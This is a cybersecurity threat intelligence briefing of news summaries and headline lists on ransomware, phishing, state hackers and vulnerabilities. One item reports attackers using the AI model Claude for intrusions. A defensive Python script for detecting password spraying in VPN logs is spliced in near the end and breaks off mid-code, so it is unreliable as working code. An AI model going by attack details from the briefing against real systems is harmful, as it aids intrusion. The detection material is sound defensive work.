Source: https://www.businesswire.com/news/home/20251117812771/en/Overconfidence-Is-the-New-Cyber-Risk-Immersives-2025-Cyber-Workforce-Benchmark-Report-Exposes-a-Global-Readiness-Illusion

The Hidden Cost of a Hack: Unpacking the Ripple Effect of Cybercrime

Beazley’s risk and resilience research with 3,500 leaders shows 29% of executives now rank cyber as their greatest threat, up from 26% in 2024. The findings highlight that business leaders may not appreciate the full lifecycle of an incident, including legal actions, regulatory scrutiny and long term reputational harm. Boards should plan for extended disruption and financial ripple effects, not only initial recovery.

Source: https://www.insurancebusinessmag.com/us/news/cyber/the-hidden-cost-of-a-hack-unpacking-the-ripple-effect-of-cybercrime-557023.aspx

Half of Ransomware Access Due to Hijacked VPN Credentials

Beazley Security reports that ransomware incidents increased in Q3 2025, with Akira, Qilin and INC responsible for about 65% of cases and leak posts rising 11% quarter on quarter. Valid VPN credentials provided initial access in 48% of breaches, up from 38% in Q2, while external service exploits accounted for 23%. Infostealers and credential stuffing attacks against SonicWall SSL VPNs feature heavily, reinforcing the need for phishing resistant MFA, conditional access and continuous vulnerability management.

Source: https://www.infosecurity-magazine.com/news/half-ransomware-access-hijacked/

Half a Million Stolen FTSE 100 Credentials Found on Criminal Sites

Socura and Flare’s “FTSE 100 for Sale” report identifies about 460,000 compromised credentials associated with FTSE 100 staff across cybercrime sites. More than 70,000 credentials relate to financial services, and 28,000 appear in infostealer logs, roughly 280 per company. Weak password practices such as “password” and obvious reuse of passwords persist, underscoring the need for strong policies, phishing resistant MFA, conditional access and proactive leak monitoring.

Source: https://www.infosecurity-magazine.com/news/half-million-stolen-ftse-100/

UK Targets Russian Cyber Gang as £14.7 Billion Attacks Hit British Economy

Sanctions against Media Land, a Russian cyber crime hosting provider, and its leader Alexander Volosovik target infrastructure accused of supporting ransomware, phishing and other criminal campaigns against UK organisations. Cyber attacks are estimated to have cost UK businesses about £14.7 billion in 2024, roughly 0.5% of GDP. The move builds on earlier actions against groups such as Evil Corp and LockBit, aiming to disrupt the broader Russia based cyber crime ecosystem.

Source: https://www.easterneye.biz/uk-cybercrime-russian-attack-british-economy/

Cyber-enabled Kinetic Targeting: Iran-linked Actor Uses Cyber Operations to Support Physical Attacks

Amazon’s threat intelligence research describes how Iran-aligned actors integrate cyber operations with physical strikes in what it calls ‘cyber enabled kinetic targeting’. The attack group called Imperial Kitten reportedly accessed a ship’s tracking platform and onboard CCTV before an attempted attack on the same vessel by a Houthi missile. Another group, MuddyWater, is linked to compromised cameras in Israel that were then used to support missile strikes, showing how hacked sensors and live data can guide battlefield decisions.

Source: https://securityaffairs.com/184862/apt/cyber-enabled-kinetic-targeting-iran-linked-actor-uses-cyber-operations-to-support-physical-attacks.html



Threats

Ransomware, Extortion and Destructive Attacks

Ransomware's Fragmentation Reaches a Breaking Point While LockBit Returns

Half of Ransomware Access Due to Hijacked VPN Credentials - Infosecurity Magazine

Russian money launderers bought a bank to disguise ransomware profit | Computer Weekly

How Kraken ransomware benchmarks your system first, then encrypts everything without warning, and steals data in the background silently | TechRadar

The Akira Playbook: How Ransomware Groups Are Weaponizing MFA Fatigue - Security Boulevard

UK's New Cybersecurity Bill Takes Aim at Ransomware Gangs and State-Backed Hackers | Fortra

UK cyber ransom ban risks collapse of essential services

The ransomware payment debate: what it means for organizations | TechRadar

'The Gentlemen' Ransomware Group with Dual-Extortion Strategy Encrypts and Exfiltrates Data

Akira ransomware expands to Nutanix AHV, raising stakes for enterprise security | CSO Online

Cat’s Got Your Files: Lynx Ransomware – The DFIR Report

Ransomware Victims

Oracle Allegedly Breached by Clop Ransomware via E-Business Suite 0-Day Hack

Checkout.com snubs hackers after data breach, to donate ransom instead

Jaguar Land Rover confirms major disruption and £196M cost from September cyberattack

Logitech confirms data breach after Clop extortion attack

Hackers Allegedly Claim Leak of LG Source Code, SMTP, and Hardcoded Credentials

The Washington Post reveals thousands impacted via Oracle-based hack | Cybernews

Everest Ransomware Group Allegedly Exposes 343 GB of Sensitive Data in Major Under Armour Breach

Cornerstone staffing ransomware attack leaks 120,000 resumes, claims Qilin gang | Cybernews

Hacker claims to steal 2.3TB data from Italian rail group, Almaviva

Phishing & Email Based Attacks

Beware! How AI is writing phishing emails that look real | PCWorld

AI Is Supercharging Phishing: Here’s How to Fight Back - SecurityWeek

Beware of Phishing Emails as Spam Filter Alerts Steal Your Email Logins in a Blink

Attackers are using “Sneaky 2FA” to create fake sign-in windows that look real | Malwarebytes

Sneaky2FA PhaaS kit now uses redteamers' Browser-in-the-Browser attack

“We've seen a 30% increase in successful email scams in the last two years” | Ctech

The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA

State Special Communications warned of a new cyber threat: which emails should not be opened and why | УНН

Other Social Engineering

Copy And Paste Cybersecurity Warning — 99% Of Enterprises Now At Risk

What to Know About the Billion-Dollar Scam Center Industry - The New York Times

The long conversations that reveal how scammers work - Help Net Security

The Akira Playbook: How Ransomware Groups Are Weaponizing MFA Fatigue - Security Boulevard

Five plead guilty to helping North Koreans infiltrate US firms

Five people plead guilty to helping North Koreans infiltrate US companies as 'remote IT workers' | TechCrunch

Five admit helping North Korea evade sanctions through IT worker schemes

DoJ nets five guilty pleas in Pyongyang’s IT-worker hustle • The Register

US: Five Plead Guilty in North Korean IT Worker Fraud Scheme - Infosecurity Magazine

Almost five-fold increase in reports of online investment ad scams

Convenience culture is breaking personal security - Help Net Security

Scammers sent 166,000 scam texts to NY residents this week in major hack | Mashable

Fraud, Scams and Financial Crime

What to Know About the Billion-Dollar Scam Center Industry - The New York Times

The long conversations that reveal how scammers work - Help Net Security

Don't get ghost tapped: 5 ways to block thieves from scanning your wallet | ZDNET

Almost five-fold increase in reports of online investment ad scams

Convenience culture is breaking personal security - Help Net Security

“We've seen a 30% increase in successful email scams in the last two years” | Ctech

BitQueen jailed as chancellor eyes up her seized £5bn wealth

AI scams surge: how consumers and businesses can stay safe | TechRadar

AI powering transnational crime as Asian gangs move into Pacific - Nikkei Asia

Online safety ‘getting worse’, warns former UK cyber security agency boss | The Standard

Payroll Pirates - Network of Criminal Groups Hijacking Payroll Systems

GenAI and Deepfakes Drive Digital Forgeries and Biometric Fraud - Infosecurity Magazine

UNC2891 Money Mule Network Reveals Full Scope of ATM Fraud Operation - Infosecurity Magazine

U.S. launches Strike Force to stop Southeast Asian scam centers stealing billions in cryptocurrency from Americans every year | TechRadar

6 ‘cyber slaves’ rescued in Myanmar are from Bengal, lured with IT job offers | Kolkata News - The Times of India

Scammers sent 166,000 scam texts to NY residents this week in major hack | Mashable

US announces new strike force targeting Chinese crypto scammers

Artificial Intelligence

Gartner: 40% of Firms to Be Hit By Shadow AI Security Incidents - Infosecurity Magazine

Beware! How AI is writing phishing emails that look real | PCWorld

AI Is Supercharging Phishing: Here’s How to Fight Back - SecurityWeek

Chinese spies used Claude to break into critical orgs • The Register

China’s ‘autonomous’ AI-powered hacking campaign still required a ton of human work | CyberScoop

AI chatbots can now execute cyberattacks almost on their own | Vox

What the Anthropic Report on AI Espionage Means for Security Leaders - Intezer

Anthropic Has Some Key Advice for Businesses in the Aftermath of a Massive AI Cyberattack

The Trojan Prompt: How GenAI is Turning Staff into Unwitting Insider Threats - Security Boulevard

Could years of AI conversations be your biggest security blind spot? | IT Pro

How attackers use patience to push past AI guardrails - Help Net Security

Dark LLMs Are Targeting MSPs’ Customers | MSSP Alert

AI Is Supercharging Disinformation Warfare | Foreign Affairs

Google: Threat Groups Will Accelerate Their Use of AI in 2026 | MSSP Alert

“We are moments before the first real cyberwar, one in which not a single shot is fired” | Ctech

Convenience culture is breaking personal security - Help Net Security

AI powering transnational crime as Asian gangs move into Pacific - Nikkei Asia

ChatGPT, Gemini, and Claude tested under extreme prompts reveal shocking weaknesses no one expected in AI behavior safeguards | TechRadar

Shadow AI: the next frontier of unseen risk | TechRadar

Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks

Microsoft Warns Windows 11 AI Can Install Malware

Perplexity's Comet AI browser may have some concerning security flaws which could let hacker hijack your device | TechRadar

GenAI and Deepfakes Drive Digital Forgeries and Biometric Fraud - Infosecurity Magazine

Foreign Spies Deploying AI in Cyberattacks | Newsmax.com

An "AI Exposure Gap" could be the most worrying security issue your business isn't aware of | TechRadar

Agentic AI puts defenders on a tighter timeline to adapt - Help Net Security

How AI can magnify your tech debt - and 4 ways to avoid that trap | ZDNET

Don't ignore the security risks of agentic AI - SiliconANGLE

Cursor Issue Paves Way for Credential-Stealing Attacks

UK’s infrastructure cyber resilience questioned after first AI-orchestrated attack confirmed | New Civil Engineer

Orange, École Polytechnique Join Forces to Boost AI & Cybersecurity Research for European Digital Sovereignty

2FA/MFA

The Akira Playbook: How Ransomware Groups Are Weaponizing MFA Fatigue - Security Boulevard

Attackers are using “Sneaky 2FA” to create fake sign-in windows that look real | Malwarebytes

The Tycoon 2FA Phishing Platform and the Collapse of Legacy MFA

Malware

Microsoft Warns Windows 11 AI Can Install Malware

SilentButDeadly - Network Communication Blocker Tool That Neutralizes EDR/AV

MacOS DigitStealer malware poses as DynamicLake, targets Apple Silicon M2/M3 devices - Help Net Security

North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels

Dragon Breath Uses RONINGLOADER to Disable Security Tools and Deploy Gh0st RAT

New npm Malware Campaign Redirects Victims to Crypto Sites - Infosecurity Magazine

Google exposes BadAudio malware used in APT24 espionage campaigns

Why ‘AI-Powered’ Cyber-Attacks Are Not a Serious Threat …Yet - Infosecurity Magazine

LLM-generated malware improving, but not operational (yet) • The Register

RondoDox expands botnet by exploiting XWiki RCE bug left unpatched since February 2025

Google Finds New Malware Backdoors Linked to Iran

Iranian Hackers Use DEEPROOT and TWOSTROKE Malware in Aerospace and Defense Attacks

Bots/Botnets

Largest Azure DDoS Attack Powered by Aisuru Botnet - SecurityWeek

RondoDox expands botnet by exploiting XWiki RCE bug left unpatched since February 2025

Mobile

'Unremovable Israeli spyware' on your Samsung phone? Here's what the controversy is all about - Android Authority

VPN Ban—iPhone And Android ‘Privacy Nightmare’ Is Coming True

Multi-threat Android malware Sturnus steals Signal, WhatsApp messages

Budget Samsung phones shipped with unremovable spyware, say researchers | Malwarebytes

WhatsApp easily exposed 3.5 billion people's phone numbers - GSMArena.com news

New Android malware can capture private messages, researchers warn | The Record from Recorded Future News

CTM360 Exposes a Global WhatsApp Hijacking Campaign: HackOnChat

WhatsApp 'Eternidade' Trojan Worms Through Brazil

Some Samsung data is being sold by a hacker, but you have nothing to worry about - SamMobile - SamMobile

NSO Group argues WhatsApp injunction threatens existence, future U.S. government work | CyberScoop

Denial of Service/DoS/DDoS

Microsoft Mitigates Record 15.72 Tbps DDoS Attack Driven by AISURU Botnet

A Perfect Storm: DDoS Attack Hits Turkish Luxury Retailer During Fall Collection Launch - Security Boulevard

Internet of Things – IoT

Cybersecurity risks inside the powertrain: why EVs need defence at the motor level - Just Auto

Data Breaches/Leaks

Half a Million Stolen FTSE 100 Credentials Found on Criminal Sites - Infosecurity Magazine

Schools share blame for PowerSchool mega-hack, say watchdogs • The Register

MoD ‘knew using Excel was risky before Afghan data leak’

Hackers Allegedly Claim Leak of LG Source Code, SMTP, and Hardcoded Credentials

The Washington Post reveals thousands impacted via Oracle-based hack | Cybernews

Everest Ransomware Group Allegedly Exposes 343 GB of Sensitive Data in Major Under Armour Breach

WhatsApp easily exposed 3.5 billion people's phone numbers - GSMArena.com news

Major Urssaf cyberattack in France affects 1.2 million Pajemploi users

Eurofiber admits crooks swiped data from French unit • The Register

Pentagon and soldiers let too many secrets slip on socials • The Register

Some Samsung data is being sold by a hacker, but you have nothing to worry about - SamMobile - SamMobile

Organised Crime & Criminal Actors

What to Know About the Billion-Dollar Scam Center Industry - The New York Times

AI powering transnational crime as Asian gangs move into Pacific - Nikkei Asia

Online safety ‘getting worse’, warns former UK cyber security agency boss | The Standard

Payroll Pirates - Network of Criminal Groups Hijacking Payroll Systems

British hacker must repay £4m after hijacking celebrity Twitter accounts - BBC News

Dutch police takes down bulletproof hosting hub linked to 80+ cybercrime cases

CISA Issues New Guidance on Bulletproof Hosting Threat - Infosecurity Magazine

UNC2891 Money Mule Network Reveals Full Scope of ATM Fraud Operation - Infosecurity Magazine

U.S. launches Strike Force to stop Southeast Asian scam centers stealing billions in cryptocurrency from Americans every year | TechRadar

6 ‘cyber slaves’ rescued in Myanmar are from Bengal, lured with IT job offers | Kolkata News - The Times of India

Russian Hacking Suspect Wanted by the FBI Arrested on Thai Resort Island - SecurityWeek

South Korean man sentenced to prison for sending $16K to North Korean hacker | NK News

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

What to Know About the Billion-Dollar Scam Center Industry - The New York Times

BitQueen jailed as chancellor eyes up her seized £5bn wealth

Europol Operation Disrupts $55m in Cryptocurrency for Piracy - Infosecurity Magazine

Wind farm worker sentenced after turning turbines into a secret crypto mine

U.S. launches Strike Force to stop Southeast Asian scam centers stealing billions in cryptocurrency from Americans every year | TechRadar

New npm Malware Campaign Redirects Victims to Crypto Sites - Infosecurity Magazine

Security researcher calls BS on Coinbase breach timeline • The Register

US announces new strike force targeting Chinese crypto scammers

Insider Risk and Insider Threats

The Trojan Prompt: How GenAI is Turning Staff into Unwitting Insider Threats - Security Boulevard

Rogue techie pleads guilty in $862K employer attack • The Register

Wind farm worker sentenced after turning turbines into a secret crypto mine

Five people plead guilty to helping North Koreans infiltrate US companies as 'remote IT workers' | TechCrunch

The Password Was ‘Password’: Why Humans Keep Breaking the Internet

Insurance

What insurers really look at in your identity controls - Help Net Security

What security pros should know about insurance coverage for AI chatbot wiretapping claims - Help Net Security

Supply Chain and Third Parties

Dark LLMs Are Targeting MSPs’ Customers | MSSP Alert

Cloud/SaaS

Microsoft: Azure hit by 15 Tbps DDoS attack using 500,000 IP addresses

Cloudflare hit by outage affecting Global Network services

And so this is how a tiny Cloudflare update broke huge chunks of the internet | TechSpot

Outages

Cloudflare hit by outage affecting Global Network services

And so this is how a tiny Cloudflare update broke huge chunks of the internet | TechSpot

The internet isn't free: Shutdowns, surveillance and algorithmic risks - Help Net Security

Identity and Access Management

What insurers really look at in your identity controls - Help Net Security

Encryption

VPN Ban—iPhone And Android ‘Privacy Nightmare’ Is Coming True

Dozens of groups call for governments to protect encryption | CyberScoop

Linux and Open Source

5 reasons Kaspersky releasing a Linux antivirus product worries me

Passwords, Credential Stuffing & Brute Force Attacks

Half of Ransomware Access Due to Hijacked VPN Credentials - Infosecurity Magazine

Half a Million Stolen FTSE 100 Credentials Found on Criminal Sites - Infosecurity Magazine

The Password Was ‘Password’: Why Humans Keep Breaking the Internet

The world's most popular passwords are pretty unsurprising - surely we can do better? | TechRadar

Holiday-themed passwords are getting shredded by attackers who know every festive trick people keep repeating across the internet. | TechRadar

Zoomers are officially worse at passwords than 80-year-olds • The Register

Cursor Issue Paves Way for Credential-Stealing Attacks

Social Media

British hacker must repay £4m after hijacking celebrity Twitter accounts - BBC News

Convenience culture is breaking personal security - Help Net Security

Pentagon and soldiers let too many secrets slip on socials • The Register

Regulations, Fines and Legislation

UK's New Cybersecurity Bill Takes Aim at Ransomware Gangs and State-Backed Hackers | Fortra

UK cyber ransom ban risks collapse of essential services

Cyber Security and Resilience (Network and Information Systems) Bill introduced to Parliament | Mayer Brown - JDSupra

VPN Ban—iPhone And Android ‘Privacy Nightmare’ Is Coming True

Dozens of groups call for governments to protect encryption | CyberScoop

SEC to Drop Controversial SolarWinds Cyberattack Lawsuit

Cyber Operations on Domestic Networks Redux | Lawfare

Information sharing law’s expiration could squander government vulnerability hunting efforts, senator says | CyberScoop

CISA 2015 Receives Extension - Infosecurity Magazine

Lawmakers reintroduce bill to bolster cybersecurity at Securities and Exchange Commission | The Record from Recorded Future News

Opinion | Shutdown left U.S. more vulnerable to cyberattacks from China, others - The Washington Post

Military Objective or Civilian Object? The Italian National Cybersecurity Agency's Status in Case of Armed Conflict - Lieber Institute West Point

ENISA Is Now a CVE Program Root - DataBreachToday

Top Senate Intel Dem warns of ‘catastrophic’ cyber consequences of Trump admin national security firings, politicization | CyberScoop

Models, Frameworks and Standards

The UK’s Proposed Cyber Security and Resilience Bill | Hogan Lovells - JDSupra

Careers, Working in Cyber and Information Security

Resilience At Risk: Talent and Governance in the Age of AI - Infosecurity Magazine

Learning Sales Skills Make Security Pros More Effective

The retail sector needs a cybersecurity talent incubator | CyberScoop

Law Enforcement Action and Take Downs

Rogue techie pleads guilty in $862K employer attack • The Register

British hacker must repay £4m after hijacking celebrity Twitter accounts - BBC News

Wind farm worker sentenced after turning turbines into a secret crypto mine

Five people plead guilty to helping North Koreans infiltrate US companies as 'remote IT workers' | TechCrunch

BitQueen jailed as chancellor eyes up her seized £5bn wealth

Europol Operation Disrupts $55m in Cryptocurrency for Piracy - Infosecurity Magazine

Dutch police takes down bulletproof hosting hub linked to 80+ cybercrime cases

UNC2891 Money Mule Network Reveals Full Scope of ATM Fraud Operation - Infosecurity Magazine

6 ‘cyber slaves’ rescued in Myanmar are from Bengal, lured with IT job offers | Kolkata News - The Times of India

Russian Hacking Suspect Wanted by the FBI Arrested on Thai Resort Island - SecurityWeek

US announces new strike force targeting Chinese crypto scammers

South Korean man sentenced to prison for sending $16K to North Korean hacker | NK News

What are the potential punishments and risks of owning a 'dodgy firestick'? | The Standard

Europol Leads Takedown of Thousands of Extremist Gaming Links - Infosecurity Magazine

Misinformation, Disinformation and Propaganda

AI Is Supercharging Disinformation Warfare | Foreign Affairs


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

“We are moments before the first real cyberwar, one in which not a single shot is fired” | Ctech

This is a pre-war situation: Chief of the General Staff of the Polish Armed Forces reacted to sabotage and cyberattacks | УНН

Russia preparing for war against NATO says top General

U.S. Space Force launches new triad of jammers to disrupt Chinese and Russian satellites

UK will not tolerate Chinese spying, minister says after MI5 alert - BBC News

MI5 Warns Lawmakers That Chinese Spies Are Trying to Reach Them via LinkedIn - SecurityWeek

Countries use cyber targeting to plan strikes: Amazon CSO • The Register

Google exposes BadAudio malware used in APT24 espionage campaigns

Iranian Hackers Launch 'SpearSpecter' Spy Operation on Defense & Government Targets

Nation State Actors

“We are moments before the first real cyberwar, one in which not a single shot is fired” | Ctech

Countries use cyber targeting to plan strikes: Amazon CSO • The Register

UK's New Cybersecurity Bill Takes Aim at Ransomware Gangs and State-Backed Hackers | Fortra

Foreign Spies Deploying AI in Cyberattacks | Newsmax.com

Palo Alto CEO tips nations to weaponize quantum by 2029 • The Register

CSIS director outlines security threats posed by Russia, China, Iran, India - National | Globalnews.ca

Take fight to the enemy, US cyber boss says • The Register

China

Chinese spies used Claude to break into critical orgs • The Register

China’s ‘autonomous’ AI-powered hacking campaign still required a ton of human work | CyberScoop

What the Anthropic Report on AI Espionage Means for Security Leaders - Intezer

AI doesn't just assist cyberattacks anymore - now it can carry them out | ZDNET

Chinese Nation-State Groups Hijacking Software Updates

UK will not tolerate Chinese spying, minister says after MI5 alert - BBC News

MI5 Warns Lawmakers That Chinese Spies Are Trying to Reach Them via LinkedIn - SecurityWeek

China-aligned threat actor is conducting widespread cyberespionage campaigns | The Record from Recorded Future News

Foreign Spies Deploying AI in Cyberattacks | Newsmax.com

U.S. Space Force launches new triad of jammers to disrupt Chinese and Russian satellites

Google exposes BadAudio malware used in APT24 espionage campaigns

Opinion | Shutdown left U.S. more vulnerable to cyberattacks from China, others - The Washington Post

Germany lines up new powers to fend off Chinese tech – POLITICO

New WrtHug campaign hijacks thousands of end-of-life ASUS routers

TP-Link accuses rival Netgear of 'smear campaign' • The Register

US announces new strike force targeting Chinese crypto scammers

Russia

This is a pre-war situation: Chief of the General Staff of the Polish Armed Forces reacted to sabotage and cyberattacks | УНН

Russia preparing for war against NATO says top General

Countries use cyber targeting to plan strikes: Amazon CSO • The Register

UK, US and Australia Sanction Russian Bulletproof Hoster Media Land - Infosecurity Magazine

UK hits Russian cyber gang as £14.7 billion attacks damage economy | EasternEye

U.S. Space Force launches new triad of jammers to disrupt Chinese and Russian satellites

Russian money launderers bought a bank to disguise ransomware profit | Computer Weekly

Russian Hacking Suspect Wanted by the FBI Arrested on Thai Resort Island - SecurityWeek

Russia keeps cutting mobile internet, and people are getting fed up - The Washington Post

Russian hackers 'accessed intimate details of thousands of couples at IVF clinics across UK' | News UK | Metro News

This notorious Russian surveillance tech maker has been hacked - could it be the end for Protei? | TechRadar

Major Russian insurer facing widespread outages after cyberattack | The Record from Recorded Future News

Iran

Cyber-enabled kinetic targeting: Iran-linked actor uses cyber operations to support physical attacks

CSIS director outlines security threats posed by Russia, China, Iran, India - National | Globalnews.ca

Iranian Hackers Launch 'SpearSpecter' Spy Operation on Defense & Government Targets

Iran's Cyber Objectives: What Do They Want?

Google Finds New Malware Backdoors Linked to Iran

Iranian Hackers Use DEEPROOT and TWOSTROKE Malware in Aerospace and Defense Attacks

North Korea

Five people plead guilty to helping North Koreans infiltrate US companies as 'remote IT workers' | TechCrunch

US: Five Plead Guilty in North Korean IT Worker Fraud Scheme - Infosecurity Magazine

North Korean Hackers Turn JSON Services into Covert Malware Delivery Channels

CSIS director outlines security threats posed by Russia, China, Iran, India - National | Globalnews.ca

South Korean man sentenced to prison for sending $16K to North Korean hacker | NK News

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Europol Leads Takedown of Thousands of Extremist Gaming Links - Infosecurity Magazine




Vulnerability Management

Chinese Nation-State Groups Hijacking Software Updates

Threat group reroutes software updates through hacked network gear - Help Net Security

Can a Global, Decentralized System Save CVE Data?

ENISA Is Now a CVE Program Root - DataBreachToday

Cyber Agency Warns of Government Exploits - DevX


Vulnerabilities

Fortinet finally cops to critical bug under active exploit • The Register

Fortinet Discloses Second Exploited FortiWeb Zero-Day in a Week - SecurityWeek

New SonicWall SonicOS flaw allows hackers to crash firewalls

Fortinet’s delayed alert on actively exploited defect put defenders at a disadvantage | CyberScoop

Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks

Perplexity's Comet AI browser may have some concerning security flaws which could let hacker hijack your device | TechRadar

7-Zip RCE flaw (CVE-2025-11001) actively exploited in attacks in the wild

SolarWinds Patches Three Critical Serv-U Vulnerabilities - SecurityWeek

ASUS warns of critical auth bypass flaw in DSL series routers

Google fixed the seventh Chrome zero-day in 2025

W3 Total Cache WordPress plugin vulnerable to PHP command injection

WordPress plugin with over a million installs may have a worrying security flaw - here's what we know | TechRadar

CVE-2025-50165: Critical Flaw in Windows Graphics Component - Security Boulevard

New WrtHug campaign hijacks thousands of end-of-life ASUS routers

ServiceNow AI Agents Can Be Tricked Into Acting Against Each Other via Second-Order Prompts

Millions of sites at risk from Imunify360 critical flaw exploit

RondoDox expands botnet by exploiting XWiki RCE bug left unpatched since February 2025

D-Link warns of new RCE flaws in end-of-life DIR-878 routers


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to external articles are provided for general interest and awareness only. Linking to or reposting external content does not constitute endorsement of or by any organisation, service, or product. We do not control and are not responsible for the content, security, or availability of external websites or links. Full credit is given to the original authors and sources. E&OE.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 14 November 2025

Black Arrow Cyber Threat Intelligence Briefing 14 November 2025:

-Microsoft Teams’ New “Chat With Anyone” Feature Exposes Users To Phishing and Malware Attacks

-Chinese Spies Told Claude To Break Into About 30 Critical Orgs. Some Attacks Succeeded

-5 Reasons Why Attackers Are Phishing Over LinkedIn

-Cyber Insurers Paid Out Over Twice as Much for UK Ransomware Attacks Last Year

-Large Organisations Aren’t Paying Ransomware Threats Anymore: SMBs Are

-FBI: Akira Gang Has Received Nearly $250 Million in Ransoms

-Companies Forced to Make Financial Changes After a Cyberattack

-Cyberattack Impact on Employees May Be as Serious as Technical Fallout

-UK’s New Cyber Security and Resilience Bill Targets Weak Links in Critical Services

-Spy Boss Says Authoritarian Nations Ready to Commit ‘High Impact Sabotage’

-Online Age Checking Is Creating a Treasure Trove of Data for Hackers

-Google Play Store Hosted 239 Malicious Apps That Were Downloaded 40 Million Times

-Android Malware Steals Your Card Details and PIN to Make Instant ATM Withdrawals

Executive Summary

We start this week with alerts on emerging attacks for business leaders and employees to act on. A new feature in Microsoft Teams gives attackers an easier route into organisations, while a leading developer of advanced AI systems has found hostile actors using its AI model to conduct real attacks. We also report how LinkedIn is used to bypass corporate email defences through direct, trusted-looking messages.

Once in, whether through these channels or others, attackers continue to deploy ransomware. Small and medium sized organisations are particularly targeted, and we highlight how incidents affect victims both financially and at a human level.

New cyber legislation is being introduced in the UK, while other countries warn of evolving nation-state threats. We also note the unintended consequences of regulatory requirements, where online age-verification data has created valuable targets for attackers. Finally, we flag malware risks in mobile phone applications found even in approved online stores.

Organisations need to understand developments in cyber security and take steps to strengthen resilience. Contact us to discuss how to do this proportionately and pragmatically.


Top Cyber Stories of the Last Week

Microsoft Teams’ New “Chat With Anyone” Feature Exposes Users To Phishing and Malware Attacks

A new feature in Microsoft Teams lets anyone start a chat with a user using only that user's email address, widening the surface for phishing and malicious file sharing. Commentators warn that attackers can use it to bypass email defences and impersonate legitimate contacts. Administrators can disable the capability, and the piece recommends pairing that configuration change with user training and MFA.

Source: https://cybersecuritynews.com/microsoft-teams-chat-with-anyone-feature/

Chinese Spies Told Claude To Break Into About 30 Critical Orgs. Some Attacks Succeeded

Anthropic identified a Chinese state-linked group using its AI model Claude to support intrusions into around 30 high-value organisations. Human operators directed strategy, while the AI handled reconnaissance and coding tasks. The case shows a growing effort to pair human oversight with automated tooling to speed up intrusions.

Source: https://www.theregister.com/2025/11/13/chinese_spies_claude_attacks/

5 Reasons Why Attackers Are Phishing Over LinkedIn

LinkedIn phishing is rising as attackers exploit direct messaging to bypass email defences. Accounts compromised through infostealer logs are used to impersonate real professionals, especially in finance and technology. The platform makes reconnaissance of roles and access levels easy. Commentators recommend stronger browser controls and monitoring of non-email channels.

Source: https://www.bleepingcomputer.com/news/security/5-reasons-why-attackers-are-phishing-over-linkedin/

Cyber Insurers Paid Out Over Twice as Much for UK Ransomware Attacks Last Year

A steep rise in ransomware events has driven cyber insurance payouts up by 230%. Insurers report more destructive attacks and increased scrutiny of controls such as patching, backups and incident response before granting cover. While insurance supports recovery, it cannot replace core cyber security hygiene or resilience measures.

Source: https://www.theregister.com/2025/11/11/ransomware_surge_fuels_230_increase/

Large Organisations Aren’t Paying Ransomware Threats Anymore: SMBs Are

Proton, a privacy and security technology provider, reports a shift in attacker focus towards SMBs as large enterprises become less willing to pay. Median ransom payments dropped sharply, while unpatched vulnerabilities remained a leading cause of compromise. SMBs face rising exposure and should prioritise staff awareness, tested backups and network segmentation to limit attacker movement and reduce impact.

Source: https://proton.me/blog/ransomware-threats-smbs

FBI: Akira Gang Has Received Nearly $250 Million in Ransoms

The Akira ransomware group has collected an estimated $244 million since 2023, mainly targeting small and medium-sized organisations across multiple sectors. Attackers often exploit weakly protected VPNs, stolen credentials and password spraying, then remove security tools and steal data rapidly. Authorities warn that Akira's speed and use of legitimate remote access tools demand tighter monitoring and faster patching.

Source: https://therecord.media/akira-gang-received-million
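The advisory summarised above singles out password spraying against VPN portals as a common Akira entry point, and "tighter monitoring" is the recommended response. The script below is an added example, not part of the briefing or of any vendor product, showing the detection logic a practitioner would put behind that advice: it separates a spray (one source, many distinct usernames, few attempts each) from single-account brute force (one source, one username, many attempts), and notes whether a spraying source later logged in successfully. The log format and sample lines are constructed for illustration and are not taken from any real device.

```python
"""Password-spray and brute-force detection over VPN authentication logs.

Added example (not from the briefing or from any vendor tool). The syslog-style
line format and the sample events below are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample: one source sprays five accounts then gets in as 'frank';
# a second source hammers a single account ('alice') repeatedly.
SAMPLE_LOG = """\
2025-11-10T08:00:01Z vpn auth-fail user=alice src=203.0.113.7
2025-11-10T08:00:04Z vpn auth-fail user=bob src=203.0.113.7
2025-11-10T08:00:09Z vpn auth-fail user=carol src=203.0.113.7
2025-11-10T08:00:15Z vpn auth-fail user=dave src=203.0.113.7
2025-11-10T08:00:20Z vpn auth-fail user=erin src=203.0.113.7
2025-11-10T08:00:31Z vpn auth-ok user=frank src=203.0.113.7
2025-11-10T08:01:00Z vpn auth-fail user=alice src=198.51.100.4
2025-11-10T08:01:30Z vpn auth-fail user=alice src=198.51.100.4
2025-11-10T08:02:00Z vpn auth-fail user=alice src=198.51.100.4
2025-11-10T08:02:30Z vpn auth-fail user=alice src=198.51.100.4
2025-11-10T08:02:45Z vpn auth-fail user=alice src=198.51.100.4
"""

# Hypothetical line format: "<ISO timestamp> vpn auth-fail|auth-ok user=<u> src=<ip>"
LINE_RE = re.compile(
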